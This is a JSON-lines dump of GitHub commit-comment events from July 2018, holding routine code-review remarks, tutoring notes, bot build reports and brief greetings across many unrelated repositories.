{"id":"8022769964","type":"CommitCommentEvent","actor":{"login":"claucece"},"repo":{"name":"otrv4/libotr-ng"},"payload":{"comment":{"id":29844045,"position":5,"line":80,"path":"src/ed448.c","commit_id":"dce8e19f66824c6211e082437c581cf261379655","created_at":"2018-07-26T13:38:05Z","updated_at":"2018-07-26T13:38:05Z","author_association":"MEMBER","body":"why we need to expose this one for the toolkit, if the goldilocks function that is exposed can be used?"}},"created_at":"2018-07-26T13:38:05Z"}
{"id":"8022777210","type":"CommitCommentEvent","actor":{"login":"smowton"},"repo":{"name":"martin-cs/cbmc"},"payload":{"comment":{"id":29844053,"position":45,"line":324,"path":"src/analyses/ai.h","commit_id":"7ab2670f070fe8627e08a2d0218c7c68220eeae1","created_at":"2018-07-26T13:39:12Z","updated_at":"2018-07-26T13:39:12Z","author_association":"NONE","body":"Yeah, but at the cost of copying whenever there's already a state :/ How about an actual `shared_ptr`, either making something fresh (will be deleted) or something also owned by the map?"}},"created_at":"2018-07-26T13:39:12Z"}
{"id":"8022777240","type":"CommitCommentEvent","actor":{"login":"Korablev77"},"repo":{"name":"Gerold103/tarantool-memes"},"payload":{"comment":{"id":29844054,"position":null,"line":null,"path":null,"commit_id":"1e52967fdaa089376baa39c7facb2e35451e3689","created_at":"2018-07-26T13:39:12Z","updated_at":"2018-07-26T13:39:12Z","author_association":"COLLABORATOR","body":"@Gerold103 \r\n\r\nWell, we have not so many 'Nacalnik's, so I guess 'the one who seeks finds the truth'...\r\nBut in case smb who is not related to our community (i.e. party crasher) wanted to kick our asses, actors would be safe."}},"created_at":"2018-07-26T13:39:12Z"}
{"id":"8022778515","type":"CommitCommentEvent","actor":{"login":"pattisdr"},"repo":{"name":"sloria/django-elasticsearch-metrics"},"payload":{"comment":{"id":29844055,"position":33,"line":39,"path":"elasticsearch_metrics/metric.py","commit_id":"0418fba408a9c9d12601d68f8d269366038ddd9d","created_at":"2018-07-26T13:39:24Z","updated_at":"2018-07-26T13:39:24Z","author_association":"COLLABORATOR","body":"Yes, I can remove, just trying to figure out where to add items to mapping.  properties seemed to be defined as fields, settings I could pass in here, additional pieces can be added as MetaFields under the Meta class."}},"created_at":"2018-07-26T13:39:24Z"}
{"id":"8022781276","type":"CommitCommentEvent","actor":{"login":"smowton"},"repo":{"name":"martin-cs/cbmc"},"payload":{"comment":{"id":29844060,"position":13,"line":46,"path":"src/analyses/ai.h","commit_id":"574f29c7d0e1372dec405efe6c720ee337351052","created_at":"2018-07-26T13:39:52Z","updated_at":"2018-07-26T13:39:52Z","author_association":"NONE","body":"Spelling :)"}},"created_at":"2018-07-26T13:39:52Z"}
{"id":"8022782325","type":"CommitCommentEvent","actor":{"login":"hankuksui"},"repo":{"name":"hankuksui/JavaTest"},"payload":{"comment":{"id":29844063,"position":5,"line":5,"path":"JavaTest/src/base/Base64Test.java","commit_id":"139b2495516351510e915f819ee29c5ec2788951","created_at":"2018-07-26T13:40:03Z","updated_at":"2018-07-26T13:40:03Z","author_association":"OWNER","body":"一定要先pull再push，否则报错.."}},"created_at":"2018-07-26T13:40:03Z"}
{"id":"8022784416","type":"CommitCommentEvent","actor":{"login":"claucece"},"repo":{"name":"otrv4/libotr-ng"},"payload":{"comment":{"id":29844067,"position":8,"line":42,"path":"src/otrng.h","commit_id":"dce8e19f66824c6211e082437c581cf261379655","created_at":"2018-07-26T13:40:24Z","updated_at":"2018-07-26T13:40:24Z","author_association":"MEMBER","body":"Why is this defined now in two files? See https://github.com/otrv4/libotr-ng/blob/master/src/otrng.c#L2104"}},"created_at":"2018-07-26T13:40:24Z"}
{"id":"8022786380","type":"CommitCommentEvent","actor":{"login":"claucece"},"repo":{"name":"otrv4/libotr-ng"},"payload":{"comment":{"id":29844070,"position":11,"line":45,"path":"src/otrng.h","commit_id":"dce8e19f66824c6211e082437c581cf261379655","created_at":"2018-07-26T13:40:42Z","updated_at":"2018-07-26T13:40:42Z","author_association":"MEMBER","body":"Why we need to expose these constants?"}},"created_at":"2018-07-26T13:40:42Z"}
{"id":"8022798045","type":"CommitCommentEvent","actor":{"login":"martin-cs"},"repo":{"name":"martin-cs/cbmc"},"payload":{"comment":{"id":29844091,"position":13,"line":46,"path":"src/analyses/ai.h","commit_id":"574f29c7d0e1372dec405efe6c720ee337351052","created_at":"2018-07-26T13:42:33Z","updated_at":"2018-07-26T13:42:33Z","author_association":"OWNER","body":"Dnoe!"}},"created_at":"2018-07-26T13:42:33Z"}
{"id":"8022798159","type":"CommitCommentEvent","actor":{"login":"TomasVotruba"},"repo":{"name":"shopsys/shopsys"},"payload":{"comment":{"id":29844092,"position":5,"line":154,"path":"composer.json","commit_id":"222369d33d3364b4c1dd2c8dc563584b41401f2d","created_at":"2018-07-26T13:42:34Z","updated_at":"2018-07-26T13:42:34Z","author_association":"MEMBER","body":"I'm not trying to be nitpicking, but is there a reason to use 2 space indentation in main `composer.json` but 4 spaces in the package one?\r\n\r\n."}},"created_at":"2018-07-26T13:42:34Z"}
{"id":"8022801297","type":"CommitCommentEvent","actor":{"login":"SylvainAf"},"repo":{"name":"SylvainAf/angular-auth-oidc-client"},"payload":{"comment":{"id":29844096,"position":null,"line":null,"path":null,"commit_id":"3e22e03408b2284e985d87d3dad4c90034457cf3","created_at":"2018-07-26T13:43:03Z","updated_at":"2018-07-26T13:43:03Z","author_association":"OWNER","body":"https://stackoverflow.com/a/47890385"}},"created_at":"2018-07-26T13:43:03Z"}
{"id":"8022804036","type":"CommitCommentEvent","actor":{"login":"mdX7"},"repo":{"name":"TrinityCore/WowPacketParser"},"payload":{"comment":{"id":29844106,"position":47,"line":213,"path":"WowPacketParserModule.V7_0_3_22248/Parsers/GarrisonHandler.cs","commit_id":"8890614d8a938a9457d0306743f48df75010ca75","created_at":"2018-07-26T13:43:30Z","updated_at":"2018-07-26T13:43:30Z","author_association":"CONTRIBUTOR","body":"OvermaxRewards count should be used as upperbound here i guess? Also I'd name it BonusRewards, just like they're called officially"}},"created_at":"2018-07-26T13:43:30Z"}
{"id":"8022809427","type":"CommitCommentEvent","actor":{"login":"fildunsky"},"repo":{"name":"esteemapp/esteem-surfer"},"payload":{"comment":{"id":29844113,"position":null,"line":null,"path":null,"commit_id":"be85d585480005b2a98ffccb6364a9b44d433a21","created_at":"2018-07-26T13:44:20Z","updated_at":"2018-07-26T13:44:20Z","author_association":"MEMBER","body":"@feruzm only please fix that bug with activity popover menu not closing when you open userhead menu"}},"created_at":"2018-07-26T13:44:20Z"}
{"id":"8022812941","type":"CommitCommentEvent","actor":{"login":"pezzo98"},"repo":{"name":"pezzo98/hello-world"},"payload":{"comment":{"id":29844116,"position":2,"line":2,"path":"README.md","commit_id":"9f12982b7605cf0011d5b32892ef0cb9f8eb9ece","created_at":"2018-07-26T13:44:54Z","updated_at":"2018-07-26T13:44:54Z","author_association":"OWNER","body":"ciao a tutti"}},"created_at":"2018-07-26T13:44:54Z"}
{"id":"8022813146","type":"CommitCommentEvent","actor":{"login":"IIvec"},"repo":{"name":"mrobaczyk/Stockfish"},"payload":{"comment":{"id":29844117,"position":null,"line":null,"path":null,"commit_id":"531e52d99d04d41a9a7b302597345651b5463679","created_at":"2018-07-26T13:44:56Z","updated_at":"2018-07-26T13:44:56Z","author_association":"NONE","body":"It seems fine!"}},"created_at":"2018-07-26T13:44:56Z"}
{"id":"8022813800","type":"CommitCommentEvent","actor":{"login":"pezzo98"},"repo":{"name":"pezzo98/hello-world"},"payload":{"comment":{"id":29844120,"position":2,"line":2,"path":"README.md","commit_id":"9f12982b7605cf0011d5b32892ef0cb9f8eb9ece","created_at":"2018-07-26T13:45:02Z","updated_at":"2018-07-26T13:45:02Z","author_association":"OWNER","body":"ciao"}},"created_at":"2018-07-26T13:45:02Z"}
{"id":"8022814336","type":"CommitCommentEvent","actor":{"login":"martin-cs"},"repo":{"name":"martin-cs/cbmc"},"payload":{"comment":{"id":29844123,"position":45,"line":324,"path":"src/analyses/ai.h","commit_id":"7ab2670f070fe8627e08a2d0218c7c68220eeae1","created_at":"2018-07-26T13:45:09Z","updated_at":"2018-07-26T13:45:09Z","author_association":"OWNER","body":"I'm not sure how the lifetime of the map in the abstract interpreter will interact with the shared_ptr.  I guess we could always store everything using shared_ptr's but that adds an extra level of indirection everywhere."}},"created_at":"2018-07-26T13:45:09Z"}
{"id":"8022814580","type":"CommitCommentEvent","actor":{"login":"theshy44"},"repo":{"name":"asemahlenonyati/Lunar-Diamond"},"payload":{"comment":{"id":29844124,"position":null,"line":null,"path":null,"commit_id":"b357876806f42d9d06c7a14c77ed744c807b969d","created_at":"2018-07-26T13:45:11Z","updated_at":"2018-07-26T13:45:11Z","author_association":"NONE","body":"hayi sana"}},"created_at":"2018-07-26T13:45:11Z"}
{"id":"8022814876","type":"CommitCommentEvent","actor":{"login":"253350"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29844127,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-26T13:45:13Z","updated_at":"2018-07-26T13:45:13Z","author_association":"NONE","body":"························"}},"created_at":"2018-07-26T13:45:13Z"}
{"id":"8022815786","type":"CommitCommentEvent","actor":{"login":"pezzo98"},"repo":{"name":"pezzo98/hello-world"},"payload":{"comment":{"id":29844130,"position":null,"line":null,"path":null,"commit_id":"9f12982b7605cf0011d5b32892ef0cb9f8eb9ece","created_at":"2018-07-26T13:45:21Z","updated_at":"2018-07-26T13:45:21Z","author_association":"OWNER","body":"grazie"}},"created_at":"2018-07-26T13:45:21Z"}
{"id":"8022816702","type":"CommitCommentEvent","actor":{"login":"TheDGOfficial"},"repo":{"name":"WolframTR/wolfram-bot"},"payload":{"comment":{"id":29844131,"position":23,"line":3,"path":"ayarlar.json","commit_id":"e7fb6f3d5e4eaa74fb7f2a33f8b2d17d92e925d6","created_at":"2018-07-26T13:45:31Z","updated_at":"2018-07-26T13:45:31Z","author_association":"NONE","body":"If this token is your current valid token, you should regenerate your token. Otherwise, other peoples seeing this file is able to use your token and your bot."}},"created_at":"2018-07-26T13:45:31Z"}
{"id":"8022819136","type":"CommitCommentEvent","actor":{"login":"ajblane"},"repo":{"name":"ajblane/dcurl"},"payload":{"comment":{"id":29844134,"position":null,"line":null,"path":null,"commit_id":"90cde2dc05d2a15eba4dc7bebe32cbf01f4a7652","created_at":"2018-07-26T13:45:55Z","updated_at":"2018-07-26T13:45:55Z","author_association":"OWNER","body":"check for 27a31fd45bb964e2511712e8eee628d36282e4a7"}},"created_at":"2018-07-26T13:45:55Z"}
{"id":"8022821780","type":"CommitCommentEvent","actor":{"login":"Rideress"},"repo":{"name":"Rideress/JavaLearning"},"payload":{"comment":{"id":29844136,"position":12,"line":9,"path":"src/main/java/HelloWorld/HelloWorld.java","commit_id":"e4ccc36ef4e7f4a4c065e27072189641f9ac2e0c","created_at":"2018-07-26T13:46:20Z","updated_at":"2018-07-26T13:46:20Z","author_association":"OWNER","body":"Ну лучше наверное начать со структуры,\r\nПолучается нам нужно, чтобы у нас компилировалась строка MySystem.myOut.myPrintln(\"Hello World\");\r\nотсюда следует, что у нас есть класс MySystem, в котором инициализировано поле myOut (оно также будет являться экземпляром класса MyOutput), и так же есть метод myPrintln() который тоже лежит в классе MySystem, какая тогда должна быть связь между myOut и myPrintln() ?"}},"created_at":"2018-07-26T13:46:20Z"}
{"id":"8022828491","type":"CommitCommentEvent","actor":{"login":"Zausen"},"repo":{"name":"Zausen/RPG-Maker"},"payload":{"comment":{"id":29844148,"position":null,"line":null,"path":null,"commit_id":"94a54e2ddd7b3640afb3e7d127b5e3debb62b68e","created_at":"2018-07-26T13:47:27Z","updated_at":"2018-07-26T13:47:27Z","author_association":"OWNER","body":"Javascript that serves to classify the Items and states. In addition you can write descriptions more extended in: weapons, armors, actors and skills."}},"created_at":"2018-07-26T13:47:27Z"}
{"id":"8022829154","type":"CommitCommentEvent","actor":{"login":"SoDa-GitHub"},"repo":{"name":"NimaQu/ss-panel-v3-mod_Uim"},"payload":{"comment":{"id":29844149,"position":null,"line":null,"path":null,"commit_id":"42f2338ef65572af3988e59c688e54e37ace8507","created_at":"2018-07-26T13:47:34Z","updated_at":"2018-07-26T13:47:34Z","author_association":"COLLABORATOR","body":"这锅我不背"}},"created_at":"2018-07-26T13:47:34Z"}
{"id":"8022829759","type":"CommitCommentEvent","actor":{"login":"smowton"},"repo":{"name":"martin-cs/cbmc"},"payload":{"comment":{"id":29844150,"position":45,"line":324,"path":"src/analyses/ai.h","commit_id":"7ab2670f070fe8627e08a2d0218c7c68220eeae1","created_at":"2018-07-26T13:47:40Z","updated_at":"2018-07-26T13:47:40Z","author_association":"NONE","body":"Hmm, so it looks like you want to give a const ref back effectively, since you're copying? In that case what about just allocating a static `bottom` instance of the domain, and giving back a reference to either that or something in the domain? Then both references are const and borrowed."}},"created_at":"2018-07-26T13:47:40Z"}
{"id":"8022829763","type":"CommitCommentEvent","actor":{"login":"Deocksoo"},"repo":{"name":"Deocksoo/data-structure-1"},"payload":{"comment":{"id":29844151,"position":null,"line":null,"path":null,"commit_id":"01ab96662de13eb7b7da52b62706b645f157adbb","created_at":"2018-07-26T13:47:40Z","updated_at":"2018-07-26T13:47:40Z","author_association":"OWNER","body":"Title 맨 앞글자가 대문자여야하는데 실수로 소문자로 적어버렸습니다..\r\n이런 실수를 간단하게 수정할 수 있는 방법은 없나요 ? ㅜㅜ"}},"created_at":"2018-07-26T13:47:40Z"}
{"id":"8022830563","type":"CommitCommentEvent","actor":{"login":"Zausen"},"repo":{"name":"Zausen/RPG-Maker"},"payload":{"comment":{"id":29844153,"position":5,"line":27,"path":"FZ_TypeItemAndState.js","commit_id":"94a54e2ddd7b3640afb3e7d127b5e3debb62b68e","created_at":"2018-07-26T13:47:48Z","updated_at":"2018-07-26T13:47:48Z","author_association":"OWNER","body":"Javascript that serves to classify the Items and states. In addition you can write descriptions more extended in: weapons, armors, actors and skills."}},"created_at":"2018-07-26T13:47:48Z"}
{"id":"8022837656","type":"CommitCommentEvent","actor":{"login":"ulf1"},"repo":{"name":"ulf1/oxyba"},"payload":{"comment":{"id":29844171,"position":null,"line":null,"path":null,"commit_id":"f28dab60a664f6b1d02459d4518548b5c23c8d80","created_at":"2018-07-26T13:48:58Z","updated_at":"2018-07-26T13:48:58Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [linreg_ols_svd](https://trello.com/c/Dablx2R1/65-linregolssvd)"}},"created_at":"2018-07-26T13:48:58Z"}
{"id":"8022837710","type":"CommitCommentEvent","actor":{"login":"selbachgra"},"repo":{"name":"selbachgra/ome-pos"},"payload":{"comment":{"id":29844172,"position":null,"line":null,"path":null,"commit_id":"0ef866d05fabfa4b60c6d896f431891dc36a893d","created_at":"2018-07-26T13:48:59Z","updated_at":"2018-07-26T13:48:59Z","author_association":"OWNER","body":"commit _AppStart"}},"created_at":"2018-07-26T13:48:59Z"}
{"id":"8022840145","type":"CommitCommentEvent","actor":{"login":"dgiardini"},"repo":{"name":"dgiardini/rtl-ais"},"payload":{"comment":{"id":29844177,"position":null,"line":null,"path":null,"commit_id":"b93f9f3cc1b9884afc940a4e1a6e6339eb4a166f","created_at":"2018-07-26T13:49:23Z","updated_at":"2018-07-26T13:49:23Z","author_association":"OWNER","body":"You are rigth, there is no optarg for -t. Must fix.\nMeanwhile, you can  change in main.c at line  106 (not tested)\n\nthis:\n   while ((opt = getopt(argc, argv, \"l:r:s:o:EODd:g:p:RATtP:h:nLS:?\")) != -1)\n\nfor this:\n    while ((opt = getopt(argc, argv, \"l:r:s:o:EODd:g:p:RATt:P:h:nLS:?\")) != -1)\n\nNote the missing colon character \":\" after the \"t\" character.\n\n\n\n\nOn Thu, Jul 26, 2018 at 8:54 AM, enetsec <notifications@github.com> wrote:\n> Hi klapligehesten, I tried to use the -t command but the application does\n> not accept even being documented in help.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n\n\n\n-- \n----------------------------------------------------------------------------------------------\nThis message represents the official view of the voices in my head\n"}},"created_at":"2018-07-26T13:49:23Z"}
{"id":"8022840394","type":"CommitCommentEvent","actor":{"login":"DevinPierce"},"repo":{"name":"DevinPierce/js-task-lister-project-nyc-web-060418"},"payload":{"comment":{"id":29844179,"position":null,"line":null,"path":null,"commit_id":"6556d49cb5aaf6feec818079a987a97a070a07d6","created_at":"2018-07-26T13:49:25Z","updated_at":"2018-07-26T13:49:25Z","author_association":"OWNER","body":"PRETTY GOOD."}},"created_at":"2018-07-26T13:49:25Z"}
{"id":"8022843556","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29844185,"position":null,"line":null,"path":null,"commit_id":"a67315d714db773a77cafab9807cc9859c38a74b","created_at":"2018-07-26T13:49:55Z","updated_at":"2018-07-26T13:49:55Z","author_association":"NONE","body":"develop (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2325 of 2325 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a67315d714db773a77cafab9807cc9859c38a74b-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a67315d714db773a77cafab9807cc9859c38a74b-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a67315d714db773a77cafab9807cc9859c38a74b-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.2%25-green.png)</a>\n"}},"created_at":"2018-07-26T13:49:55Z"}
{"id":"8022844440","type":"CommitCommentEvent","actor":{"login":"dastanabeuov"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29844187,"position":29,"line":125,"path":"1-Osnovy-Ruby-polnaya-PO/lesson6/interface.rb","commit_id":"fb4e8033605aec4859790af722f23c22b700bef8","created_at":"2018-07-26T13:50:03Z","updated_at":"2018-07-26T13:50:03Z","author_association":"OWNER","body":"ispravil"}},"created_at":"2018-07-26T13:50:03Z"}
{"id":"8022844552","type":"CommitCommentEvent","actor":{"login":"jserv"},"repo":{"name":"ajblane/dcurl"},"payload":{"comment":{"id":29844188,"position":22,"line":134,"path":"src/pow_fpga_accel.c","commit_id":"27a31fd45bb964e2511712e8eee628d36282e4a7","created_at":"2018-07-26T13:50:04Z","updated_at":"2018-07-26T13:50:04Z","author_association":"NONE","body":"What are your considerations to use buffered I/O functions such as `fwrite` instead of low-level I/O ones (such as `write`)?"}},"created_at":"2018-07-26T13:50:04Z"}
{"id":"8022846857","type":"CommitCommentEvent","actor":{"login":"preda-bogdan"},"repo":{"name":"LauraCarmen/processing-text"},"payload":{"comment":{"id":29844195,"position":7,"line":24,"path":"index_text.js","commit_id":"bb91b07706a0bf02d49bb1d79c2b760a2bf0a52f","created_at":"2018-07-26T13:50:26Z","updated_at":"2018-07-26T13:50:26Z","author_association":"COLLABORATOR","body":"```\r\nfunction f2 ( cuvinte, pisicamea, cuvant ) {\r\n\tfor ( let i = 0; i < cuvinte.length; i++ ) {\r\n\t\tpisicamea = pisicamea.replace( cuvinte[i], cuvant );\r\n\t}\r\n\treturn pisicamea;\r\n}\r\n\r\nconsole.log( f2( cuvinte, pisicamea, \"magduta\" ) );\r\n```\r\n\r\nsau asa?"}},"created_at":"2018-07-26T13:50:26Z"}
{"id":"8022847110","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"vladimirblokhin/course"},"payload":{"comment":{"id":29844196,"position":6,"line":6,"path":"Lesson_2/vowels.rb","commit_id":"5aa436bb6d2e02fc3ff59b2d932b2c9f0d59e54b","created_at":"2018-07-26T13:50:29Z","updated_at":"2018-07-26T13:50:29Z","author_association":"NONE","body":"\r\nпо сути ты в этой строке проверяешь влкючен ли текущий элемент списка в другой список\r\n(входит ли буква алфавита в список глассных)\r\n\r\nчтобы проверить включен ли объект в коллекцию, лучше проще всего использовать метод [include?](https://ruby-doc.org/core-2.5.1/Array.html#method-i-include-3F)\r\n"}},"created_at":"2018-07-26T13:50:29Z"}
{"id":"8022847330","type":"CommitCommentEvent","actor":{"login":"thaichessswinboard"},"repo":{"name":"ianfab/Makruk-Stockfish"},"payload":{"comment":{"id":29844197,"position":null,"line":null,"path":null,"commit_id":"72e094284146c2db8f14c511e2794099c3158305","created_at":"2018-07-26T13:50:30Z","updated_at":"2018-07-26T13:50:30Z","author_association":"NONE","body":"for this picture black to move it must move Bishop zigzag not still Bishop\nif don't move Bishop White side will capture Bishop and then the game it\nwill be Draw By White move King to conner that KNQK Can checkmate. and\nanother picture it nealy the same Black to move ,Black should move Bishop\nZigzag don't let White side capture of sucide Rook for Bishop. and let the\ngame have KNQK again and then human or opponent will find Draw game by move\nKing to the conner that KNQ can't solve the problem. I Hope you understand\nwhat i MEAN.\n\nMany Thank\n\nPCST.\n\nOn Thu, Jul 26, 2018 at 10:11 AM, Fabian Fichter <notifications@github.com>\nwrote:\n\n> @thaichessswinboard <https://github.com/thaichessswinboard> Thanks for\n> your feedback. I did not have the possibility to test the aforementioned\n> endgames yet, but from the code it should be clear that it never prefers\n> KNQK over KBQK, since VALUE_KNOWN_WIN is added for the KBQK endgame,\n> which means that it is evaluated >+100 pawns, whereas the KNQK evaluation\n> is close to zero (unless mate is found).\n>\n> I guess the issue is that it does not see a way to force a KBQK endgame\n> (since otherwise it would go for it), so there seemingly are only the two\n> possibilities of continuing the KNBQKN/KNBQKR endgame or simplifying to\n> KNQK, and there it might wrongly prefer KNQK. I will have a closer look at\n> this tomorrow. If you could provide some problematic positions, that would\n> be nice, since it is then easier to investigate the issue.\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/ianfab/Makruk-Stockfish/commit/72e094284146c2db8f14c511e2794099c3158305#commitcomment-29840877>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AnxMlJHKxw-FtcdP_S0OHzrR6vJ9i2EPks5uKYfegaJpZM4Vghb9>\n> .\n>\n"}},"created_at":"2018-07-26T13:50:30Z"}
{"id":"8022851558","type":"CommitCommentEvent","actor":{"login":"feruzm"},"repo":{"name":"esteemapp/esteem-surfer"},"payload":{"comment":{"id":29844203,"position":null,"line":null,"path":null,"commit_id":"be85d585480005b2a98ffccb6364a9b44d433a21","created_at":"2018-07-26T13:51:10Z","updated_at":"2018-07-26T13:51:10Z","author_association":"MEMBER","body":"@talhasch fixed with last commits 🎉 "}},"created_at":"2018-07-26T13:51:10Z"}
{"id":"8022852682","type":"CommitCommentEvent","actor":{"login":"preda-bogdan"},"repo":{"name":"LauraCarmen/processing-text"},"payload":{"comment":{"id":29844206,"position":7,"line":24,"path":"index_text.js","commit_id":"bb91b07706a0bf02d49bb1d79c2b760a2bf0a52f","created_at":"2018-07-26T13:51:20Z","updated_at":"2018-07-26T13:51:20Z","author_association":"COLLABORATOR","body":"functioneaza si varianta ta si e corecta, dar nu poti sa trimiti ce lista vrei tu, trebuie sa modifici tot timpul manual lista de cuvinte"}},"created_at":"2018-07-26T13:51:20Z"}
{"id":"8022853759","type":"CommitCommentEvent","actor":{"login":"woonsanko"},"repo":{"name":"onehippo/hippo-demo-spa-integration"},"payload":{"comment":{"id":29844209,"position":null,"line":null,"path":null,"commit_id":"3940d703c9fa05a26fd1ef0a1ee001d3ac85869e","created_at":"2018-07-26T13:51:30Z","updated_at":"2018-07-26T13:51:30Z","author_association":"MEMBER","body":"@robbertkauffman The original one was to make it work in both env: bundled js in site webapp and separate localhost:3000. Your change seems to make the first one invalid. Can you revert it?"}},"created_at":"2018-07-26T13:51:30Z"}
{"id":"8022854528","type":"CommitCommentEvent","actor":{"login":"IIvec"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":29844213,"position":null,"line":null,"path":null,"commit_id":"92fd61bbae08501ad37a19fae6fd4041d6d7f092","created_at":"2018-07-26T13:51:38Z","updated_at":"2018-07-26T13:51:38Z","author_association":"NONE","body":"Good luck with LTC, and try even higher value."}},"created_at":"2018-07-26T13:51:38Z"}
{"id":"8022855857","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29844219,"position":null,"line":null,"path":null,"commit_id":"a67315d714db773a77cafab9807cc9859c38a74b","created_at":"2018-07-26T13:51:51Z","updated_at":"2018-07-26T13:51:51Z","author_association":"NONE","body":"develop (mjwitte) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a67315d714db773a77cafab9807cc9859c38a74b-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-26T13:51:51Z"}
{"id":"8022859221","type":"CommitCommentEvent","actor":{"login":"ajblane"},"repo":{"name":"ajblane/dcurl"},"payload":{"comment":{"id":29844228,"position":45,"line":89,"path":"README.md","commit_id":"68545aec347a05ce519bbfe73fa3e11a59212557","created_at":"2018-07-26T13:52:25Z","updated_at":"2018-07-26T13:52:25Z","author_association":"OWNER","body":"To remove print information, we need to remove [this code](https://github.com/LampaLab/iota_fpga/blob/master/pow_accel_soc/software/drv/curl_main.c#L49) and recompile this Linux driver."}},"created_at":"2018-07-26T13:52:25Z"}
{"id":"8022862884","type":"CommitCommentEvent","actor":{"login":"TheDGOfficial"},"repo":{"name":"WolframTR/wolfram-bot"},"payload":{"comment":{"id":29844231,"position":7,"line":8,"path":"bot.js","commit_id":"4adca7496a626326a0740b0357dd5df199444507","created_at":"2018-07-26T13:52:59Z","updated_at":"2018-07-26T13:52:59Z","author_association":"NONE","body":"You should create a single Discord.Client(); object, assign the client variable and reference other variables to client variable. E.g:\r\n\r\n```javascript\r\nconst client = new Discord.Client();\r\nconst bot = client;\r\nconst Wolfram = client;\r\n```"}},"created_at":"2018-07-26T13:52:59Z"}
{"id":"8022867753","type":"CommitCommentEvent","actor":{"login":"ghostrider-reborn"},"repo":{"name":"dot-tomato/device_yu_tomato"},"payload":{"comment":{"id":29844240,"position":null,"line":null,"path":null,"commit_id":"6a5e7f649a6d7eb2b6b88f2d8f649df44cf9a566","created_at":"2018-07-26T13:53:46Z","updated_at":"2018-07-26T13:53:46Z","author_association":"CONTRIBUTOR","body":"Authorship ?"}},"created_at":"2018-07-26T13:53:46Z"}
{"id":"8022870901","type":"CommitCommentEvent","actor":{"login":"martin-cs"},"repo":{"name":"martin-cs/cbmc"},"payload":{"comment":{"id":29844243,"position":45,"line":324,"path":"src/analyses/ai.h","commit_id":"7ab2670f070fe8627e08a2d0218c7c68220eeae1","created_at":"2018-07-26T13:54:16Z","updated_at":"2018-07-26T13:54:16Z","author_association":"OWNER","body":"It used to be a reference but that doesn't work for things like context sensitive analysis where the domain that is returned is a merge of a bunch of other domains, or for approaches that only store a few domains but could recompute an arbitrary location on the fly ;-)"}},"created_at":"2018-07-26T13:54:16Z"}
{"id":"8022871418","type":"CommitCommentEvent","actor":{"login":"sidbalu7"},"repo":{"name":"ceciliachoi/SecureGateway"},"payload":{"comment":{"id":29844244,"position":null,"line":null,"path":null,"commit_id":"21bf89fae01ec31bdb7de21e0315af7b06e95218","created_at":"2018-07-26T13:54:21Z","updated_at":"2018-07-26T13:54:21Z","author_association":"NONE","body":"Makes sense now but each time the hostname changes when they create a new gateway instead they can list all the hostnames in their firewall and not keep changing \r\nIt's just that we have received a lot of tickets asking us the list of hostnames and ports for firewall "}},"created_at":"2018-07-26T13:54:21Z"}
{"id":"8022876216","type":"CommitCommentEvent","actor":{"login":"dastanabeuov"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29844254,"position":16,"line":90,"path":"1-Osnovy-Ruby-polnaya-PO/lesson6/train.rb","commit_id":"fb4e8033605aec4859790af722f23c22b700bef8","created_at":"2018-07-26T13:55:09Z","updated_at":"2018-07-26T13:55:09Z","author_association":"OWNER","body":"horosho ispravlyu..."}},"created_at":"2018-07-26T13:55:09Z"}
{"id":"8022878404","type":"CommitCommentEvent","actor":{"login":"discoursebot"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29844255,"position":null,"line":null,"path":null,"commit_id":"fa6b7f6b8cf01b9f8fb8d8ee71f2cf25fb48b674","created_at":"2018-07-26T13:55:29Z","updated_at":"2018-07-26T13:55:29Z","author_association":"NONE","body":"This commit has been mentioned on **Discourse Meta**. There might be relevant details there:\n\nhttps://meta.discourse.org/t/missing-preview/92426/11\n"}},"created_at":"2018-07-26T13:55:29Z"}
{"id":"8022885108","type":"CommitCommentEvent","actor":{"login":"mpu-creare"},"repo":{"name":"creare-com/podpac"},"payload":{"comment":{"id":29844264,"position":null,"line":null,"path":null,"commit_id":"a7a9e92d7b92310ab2fb019d02736d228ca939e2","created_at":"2018-07-26T13:56:33Z","updated_at":"2018-07-26T13:56:33Z","author_association":"CONTRIBUTOR","body":"@lvacreare  we should avoid putting configuration-specific paths in the code. Thanks for working on a branch. We can discuss how to do this more generally. "}},"created_at":"2018-07-26T13:56:33Z"}
